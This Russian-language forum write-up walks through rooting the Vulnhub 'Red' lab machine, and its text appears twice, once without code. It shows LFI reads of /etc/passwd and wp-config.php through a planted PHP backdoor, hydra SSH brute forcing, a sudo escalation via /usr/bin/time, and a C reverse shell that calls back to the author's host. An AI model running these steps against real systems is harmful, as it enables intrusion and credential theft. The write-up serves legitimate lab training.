Приветствую!
Представляю вашему вниманию прохождение относительно новой машины (27 Oct 2021) с Vulnhub -
Исходные данные следующие:
Дана машина Ubuntu, которую взломал маньяк-психопат Red. Наша задача - захватить её обратно (т.е. получить права пользователя root. Делать мы это будем, как обычно с Kali Linux.
Ну, начнем пожалуй.
Узнаём ip адрес атакуемой машины командой:
У меня ip нужной машины =
Теперь просканируем машину nmap'oм:
Видим открытые порты 22 и 80, ssh и seb-server соответственно. Так же, сразу видно что сайт создан на wordpress, версии 5.8.1, версию web-сервера apache (2.4.41) и заголовок, сообщающий нам, что сайт взломан.
Перейдя на сайт, видим, что он плохо прогрузился и заглянув в исходники, становится ясно, почему - нужно добавить домен в файл hosts:
Снова переходим на сайт (
Перебор директорий сайта ничего не дал, wpscan и другие сканеры (такие, как XAttacker и nikto) тоже ничего полезного не выявили, однако просматривая источники нашлись интересные ссылки (на самом деле, я уже просто просматривал все подряд):
и
Еще я попробовал экслоит CVE-2017-5487 и добыл имя пользователя wordpress:
Тоже самое видно, если перейти на:
Перебор id пользователей ничего не дает, видимо это тупиковое направление. Но у нас есть еще одна интересная ссылка
Обыскав весь сайт и даже попробовав побрутфорсить пароль к админке, пришлось присмотреться к подсказке повнимательнее:
Слова "Looking For It" и "ask Mr. Miessler" выглядят подозрительно. аббревиатура 1-го - LFI, похоже это намек. Вбив в гугл "Mr. Miessler LFI" был найден репозиторий GitHub - danielmiessler/SecLists: SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. и из него же, долгими ковыряниями SecLists/CommonBackdoors-PHP.fuzz.txt at master · danielmiessler/SecLists
Чуток поразбиравшись, что тут для чего, догадываемся, что надо попытаться профаззить сайт со словарем CommonBackdoors-PHP.fuzz.txt
В результате получаем вывод:
Перейдя видим пустую страницу, эксперемент с запросами ничего не дал, поэтому идем в гугл с вопросом: "NetworkFileManagerPHP.php backdoor". И сразу же находится репозиторий
Время использовать wfuzz:
Вот мы и получили нужный параметр (key), который мы и будем использовать, например прочитаем файл /etc/passwd:
Сразу же видим имена 3-х пользователей, кроме рута: john, ippsec и oxdf, возьмем их на заметку.
Сразу же стоит глянуть конфиг вордпресса. Для этого пошлем запрос
а в ответ получим закодированный в base64 wp-config.php
расшифровываем base64 и просматривая страницу видим логин и пароль:
НО! ssh данный пароль не принимает. Обидно!
Долго ползая дальше по сайту, я наконец-то догадался просмотреть код самой страницы шелла:
В ответ так же, как и в прошлый раз приходит код страницы, в котором есть еще одна подсказка:
Получаем вывод возможных паролей и пробрутив их через гидру получаем сам пароль:
И тут становится понятно, что машиной завладел какой-то особо опасный маньяк-психопат. Раз в минуту приходят стебные сообщения от Red'a, cat заменен на страшный vim, пароль от учетки постоянно меняются, а нас периодически выкидывает из сесси. Просто содомия какая-то. Полазив по целевой машине минут 7, я уже хотел бросить это дело, но все-таки решил, что надо добить её, назло создателю...
Просмотрев файлы в каталоге пользователя видно некий
Первым делом проверим, что можно сделать из-под sudo:
(ippsec) NOPASSWD: /usr/bin/time
О, это просто, повышаем привелегии:
Отлично, просмотрев, что за файлы есть в директории пользователя ippsec, видим наш флаг user.txt. Вот только - это обманка, там опять стеб:
Спустя много попыток и нервов (помним про все пакости реда), просматривая к чему у пользователя ippsec есть доступ:
Видим гит:
Это неспроста! Идем смотреть и видим 2 файла:
supersecretfileuc.c <- исходник файла rev и все, что он делает - выводит сообщение "Get out of here Blue!"
Дальше я очень долго лазил по серверу и пытался что-то сделать, но в итоге, методом тыка оказалось, что этот файл (rev) периодически перекомпилируется и выполняется (предположительно), так что я удалил оба файла и создал свой файл исходника с реверс-шеллом на С:
Запускаем прослушиватель на основной машине командой:
И через пару минут получаем шел рута
Он не очень удобный, поэтому следует создать полноценный терминал командой:
Вот и все МЫ ЕСТЬ РУТ!
Идем смотреть наши флаги:
А они все равно фейковые)
Ну что ж, вот и подошел к концу разбор очередной коробки, на самом деле это было довольно не приятно, данная статья просто не может выразить все эмоции, от того, как сильно эта машина бесила и сколько нервов съела.
*напоминаю*
Спасибо всем, кто дочитал этот врайтап. Надеюсь было интересно.
P.S. Я думаю написать еще отдельно статью о том, как сделать подобную подлянку и как её исправить, если её подложили вам, но это точно будет позже, пишите, кстати, если все-таки интересно как же это сделать)
Представляю вашему вниманию прохождение относительно новой машины (27 Oct 2021) с Vulnhub -
Ссылка скрыта от гостей
Исходные данные следующие:
Дана машина Ubuntu, которую взломал маньяк-психопат Red. Наша задача - захватить её обратно (т.е. получить права пользователя root. Делать мы это будем, как обычно с Kali Linux.
Ну, начнем пожалуй.
Узнаём ip адрес атакуемой машины командой:
~$ sudo netdiscoverУ меня ip нужной машины =
192.168.3.156.Теперь просканируем машину nmap'oм:
~$ nmap -A -p- -v 192.168.3.156
Видим открытые порты 22 и 80, ssh и seb-server соответственно. Так же, сразу видно что сайт создан на wordpress, версии 5.8.1, версию web-сервера apache (2.4.41) и заголовок, сообщающий нам, что сайт взломан.
Перейдя на сайт, видим, что он плохо прогрузился и заглянув в исходники, становится ясно, почему - нужно добавить домен в файл hosts:
~$ cat "192.168.3.156 redrocks.win" >> /etc/hostsСнова переходим на сайт (
Ссылка скрыта от гостей
) и в этот раз, видим, что повсюду надписи, гласящие, что сайт взломан.Перебор директорий сайта ничего не дал, wpscan и другие сканеры (такие, как XAttacker и nikto) тоже ничего полезного не выявили, однако просматривая источники нашлись интересные ссылки (на самом деле, я уже просто просматривал все подряд):
http://redrocks.win/wp-json/и
http://redrocks.win/feed/
Еще я попробовал экслоит CVE-2017-5487 и добыл имя пользователя wordpress:
Тоже самое видно, если перейти на:
http://redrocks.win/wp-json/wp/v2/users/1
Перебор id пользователей ничего не дает, видимо это тупиковое направление. Но у нас есть еще одна интересная ссылка
http://redrocks.win/feed/ , перейдя по которой скачивается файл с исходником какой-то страницы, в котором содержится язвительный комментарий с подсказкой:
Обыскав весь сайт и даже попробовав побрутфорсить пароль к админке, пришлось присмотреться к подсказке повнимательнее:
<p><!-- Still Looking For It? Maybe you should ask Mr. Miessler for help, not that it matters, you won't be able to read anything with it anyway --></p>Слова "Looking For It" и "ask Mr. Miessler" выглядят подозрительно. аббревиатура 1-го - LFI, похоже это намек. Вбив в гугл "Mr. Miessler LFI" был найден репозиторий GitHub - danielmiessler/SecLists: SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. и из него же, долгими ковыряниями SecLists/CommonBackdoors-PHP.fuzz.txt at master · danielmiessler/SecLists
Чуток поразбиравшись, что тут для чего, догадываемся, что надо попытаться профаззить сайт со словарем CommonBackdoors-PHP.fuzz.txt
~$ gobuster dir -w CommonBackdoors-PHP.fuzz.txt -x .php -u http://redrocks.win/ -o dir.txtВ результате получаем вывод:
Перейдя видим пустую страницу, эксперемент с запросами ничего не дал, поэтому идем в гугл с вопросом: "NetworkFileManagerPHP.php backdoor". И сразу же находится репозиторий
Время использовать wfuzz:
~$ wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w /usr/share/wfuzz/wordlist/general/big.txt
~$ wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w /usr/share/wfuzz/wordlist/general/big.txt --hh 00
Вот мы и получили нужный параметр (key), который мы и будем использовать, например прочитаем файл /etc/passwd:
http://redrocks.win/NetworkFileManagerPHP.php?key=../../../../../../../../etc/passwd
Сразу же видим имена 3-х пользователей, кроме рута: john, ippsec и oxdf, возьмем их на заметку.
Сразу же стоит глянуть конфиг вордпресса. Для этого пошлем запрос
http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=wp-config.phpа в ответ получим закодированный в base64 wp-config.php
расшифровываем base64 и просматривая страницу видим логин и пароль:
НО! ssh данный пароль не принимает. Обидно!
Долго ползая дальше по сайту, я наконец-то догадался просмотреть код самой страницы шелла:
http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=NetworkFileManagerPHP.phpВ ответ так же, как и в прошлый раз приходит код страницы, в котором есть еще одна подсказка:
Что-то странное, снова топаем в поисковик, про "Hashcat rules", сразу же нагугливается best64.rule и почитав описание используем hashcat следующим образом:
~$ hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule
Получаем вывод возможных паролей и пробрутив их через гидру получаем сам пароль:
~$ hydra -l john -P passwd.txt 192.168.3.156 ssh
И тут становится понятно, что машиной завладел какой-то особо опасный маньяк-психопат. Раз в минуту приходят стебные сообщения от Red'a, cat заменен на страшный vim, пароль от учетки постоянно меняются, а нас периодически выкидывает из сесси. Просто содомия какая-то. Полазив по целевой машине минут 7, я уже хотел бросить это дело, но все-таки решил, что надо добить её, назло создателю...
Просмотрев файлы в каталоге пользователя видно некий
note_from_red.txt, в котором только издевка:Первым делом проверим, что можно сделать из-под sudo:
john@red:~$ sudo -l(ippsec) NOPASSWD: /usr/bin/time
О, это просто, повышаем привелегии:
john@red:~$ sudo -u ippsec /usr/bin/time /bin/bash
Отлично, просмотрев, что за файлы есть в директории пользователя ippsec, видим наш флаг user.txt. Вот только - это обманка, там опять стеб:
Спустя много попыток и нервов (помним про все пакости реда), просматривая к чему у пользователя ippsec есть доступ:
john@red:~$ find / -group ippsec -type d 2> /dev/nullВидим гит:
/var/www/wordpress/.git
Это неспроста! Идем смотреть и видим 2 файла:
supersecretfileuc.c <- исходник файла rev и все, что он делает - выводит сообщение "Get out of here Blue!"
Дальше я очень долго лазил по серверу и пытался что-то сделать, но в итоге, методом тыка оказалось, что этот файл (rev) периодически перекомпилируется и выполняется (предположительно), так что я удалил оба файла и создал свой файл исходника с реверс-шеллом на С:
C:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
void main(){
int port = 1337;
struct sockaddr_in revsockaddr;
int sock = socket(AF_INET, SOC_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("192.168.3.111"); // IP основной машины
connect(sock, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
dup2(sock,0);
dup2(sock,1);
dup2(sock,2);
char * const argv[] = {"/bin/sh", NULL};
execve("/bin/sh", argv, NULL);
return 0;
}Запускаем прослушиватель на основной машине командой:
~$ nc -lnvp 1337И через пару минут получаем шел рута
Он не очень удобный, поэтому следует создать полноценный терминал командой:
~$ python3 -c 'import pty;pty.spawn("/bin/bash")'Вот и все МЫ ЕСТЬ РУТ!
Идем смотреть наши флаги:
А они все равно фейковые)
Ну что ж, вот и подошел к концу разбор очередной коробки, на самом деле это было довольно не приятно, данная статья просто не может выразить все эмоции, от того, как сильно эта машина бесила и сколько нервов съела.
*напоминаю*
Спасибо всем, кто дочитал этот врайтап. Надеюсь было интересно.
P.S. Я думаю написать еще отдельно статью о том, как сделать подобную подлянку и как её исправить, если её подложили вам, но это точно будет позже, пишите, кстати, если все-таки интересно как же это сделать)
Последнее редактирование модератором:
